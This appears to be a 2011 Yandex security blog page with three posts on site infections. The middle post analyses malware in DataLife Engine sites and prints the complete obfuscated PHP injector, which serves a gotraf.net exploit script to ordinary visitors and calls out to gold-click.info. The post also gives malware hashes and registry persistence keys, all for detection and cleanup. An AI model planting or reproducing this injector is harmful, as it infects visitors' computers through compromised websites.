Блог о безопасности

июль 2011
Яндекс.Вебмастер помогает найти вредоносный код на страницах сайта
5 июля 2011, 22:51

После того, как вебмастер обнаруживает, что его сайт заражен, обычно перед ним возникает задача как можно скорее найти и удалить вредоносный код. Это можно сделать при помощи вкладки "Безпасность" в Яндекс.Вебмастере. Теперь на ней отображается не только список заражённых страниц, но и тип заражения каждой из них. Для большинства типов заражения есть возможность перейти в раздел помощи с примерами вредоносного кода, которые помогают его обнаружить.

Выглядит это следующим образом:

К тому же, Яндекс.Вебмастер позволяет подписаться на уведомления о заражении зарегистрированного в нём сайта и запросить его перепроверку после устранения проблемы.

Но лучше, конечно, не допускать заражения сайта. Обновляйте ПО, пользуйтесь антивирусами, ограничивайте доступ и берегите пароли.

5 комментариев
запуски
Вредоносный код с gotraf.net
21 июля 2011, 17:50
Причиной заражения сайтов вредоносным кодом часто становится взлом систем управления контентом с последующим изменением их исходных кодов.

Мы обнаружили, что в последнее время стали чаще происходить случаи заражения сайтов, работающих на CMS DataLife Engine кодом, который добавляет на страницу тег <script>. Пример кода, которым происходит заражение:


<? $GLOBALS['_dleget_']=Array(base64_decode('' .'cHJlZ19' .'tYX' .'RjaA=='),base64_decode('cH' .'JlZ19' .'tYXRjaA=='),base64_decode('cHJlZ19tY' .'XRjaA==')); ?><? function dleget($i){$a=Array('ZGxlX3Bhc3N3b3Jk','L3lhbmRleC9p','SFRUUF9VU0VSX0FHRU5U','L2dvb2dsZS9p','SFRUUF9VU0VSX0FHRU5U','L2JvdC9p','SFRUUF9VU0VSX0FHRU5U', PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly9nb3RyYWYubmV0L2luLnBocD9pZD0xMTEiPjwvc2NyaXB0Pg== ');return base64_decode($a[$i]);} ?><? if((!isset($_COOKIE[dleget(0)]))and(!$GLOBALS['_dleget_'][0](dleget(1),$_SERVER[dleget(2)]))and(!$GLOBALS['_dleget_'][1](dleget(3),$_SERVER[dleget(4)]))and(!$GLOBALS['_dleget_'][2](dleget(5),$_SERVER[dleget(6)]))){echo dleget(7);} if(isset($_SERVER["HTTP_HOST"])){ $host = str_replace("www.","",$_SERVER["HTTP_HOST"]); file_get_contents('http://gold-click.info/tds.php?jkdptbw='.$host);} ?>


Данный код проверяет, установлены ли cookie с именем dle_password и присутствуют ли в значении HTTP-заголовка User-Agent следующие строки:
  • yandex
  • google
  • bot

Если cookie с именем dle_password не установлены и в значении HTTP заголовка User-Agent не присутствует строк yandex, google или bot, то в код страницы вставляется:

<script src=http://gotraf.net/in.php?id=<id>
 где <id> – трёхзначное число.

Общие рекомендации, как удалить со страницы вредоносный код и больше не дать его разместить, описаны в соответствующем разделе помощи. Узнать подробности о том, какие страницы заражены, можно, зарегистрировав заражённый сайт на Яндекс.Вебмастере.

При посещении сайта, который использует CMS, зараженную данным серверным скриптом, в браузере автоматически исполняется браузерный скрипт, подгружаемый с хоста gotraf.net. Этот браузерный скрипт пытается эксплуатировать уязвимости в популярных браузерах и сторонних продуктах. При удачной эксплуатации хотя бы одной из уязвимостей на компьютер пользователя загружается и устанавливается вредоносное ПО.

По данным с virustotal.com, на 19.07.2011 вредоносное ПО с хоста gotraf.net детектировалось только антивирусами:

Хэши вредоносного файла:
  • MD5: c852cb73a67be8080b292577e77349d0 ;
  • SHA1: d66db7ab31b5b6ac83cb17b58e40f1eca3acc2d9 ;
  • SHA256: d01d44972e2e853907ec0f6acaa9ff60bb797825c0dd107655f1b963c70ce2a1 .

Вирус блокирует работу операционной системы, копирует себя в папку C:\Program Files\Common Files\ с именем winlogin.exe, а также создает 2 записи в реестре, чтобы при каждом последующем старте операционной системы происходил его запуск.

Записи в реестре:
  • HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Winlogon\Shell = Explorer.exe "C:\Program Files\Common Files\winlogin.exe" ;
  • HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run\winlogin = "C:\Program Files\Common Files\winlogin.exe" .

Для удаления вируса с компьютера пользователя вручную, нужно удалить соответствующие записи в реестре, а также файл winlogin.exe (не перепутайте с winlogon.exe) .

Чтобы удалить вирус, можно также воспользоваться бесплатными утилитами от Лаборатории Касперского и DrWeb, приведёнными в этом разделе.

Как выбрать и настроить браузер, антивирус, брандмауэр, ОС компьютера, чтобы обеспечить максимальную безопасность работы в Интернете – описано здесь.

Команда безопасного поиска Яндекса

17 комментариев
исследования
Изменения в правилах предупреждения о заражённых страницах
28 июля 2011, 17:42

В последнее время мы стали чаще встречаться со случаями взлома и заражения сайтов, предоставляющих в пользование свои поддомены. При этом если сайт на домене заражается, то в большинстве случаев страницы сайтов, расположенных на поддоменах, тоже начинают распространять вредоносный код.

Чтобы более точно и оперативно предупреждать пользователей о вредоносном коде на страницах таких сайтов, теперь Яндекс считает страницы заражёнными по следующим правилам:


  1. Если сайт на домене заражён – все сайты на его поддоменах автоматически считаются заражёнными.

  2. Если сайт на поддомене заражён, сайты на домене и других поддоменах этого домена считаются заражёнными, только если на них тоже найдены страницы, распространяющие вредоносный код.

  3. Если организованный в виде отдельных директорий хостинг, блогохостинг, хостинг файлов или автоматический редиректор сокращённых ссылок содержит заражённые объекты, то заражённым может считаться как весь сайт, так и отдельные директории или даже отдельные страницы. Что именно будет считаться заражённым, зависит от расположения объектов с вредоносным кодом, истории предыдущих заражений, общего количества страниц на сайте и других факторов.


Если есть признаки массового заражения сайтов на поддоменах или объектов в папках, прогрессирующего заражения или «бегущей волны», то заражёнными считаются все страницы сайта во всех директориях и на всех его поддоменах.


Схематически эти правила можно представить так:

16 комментариев
запуски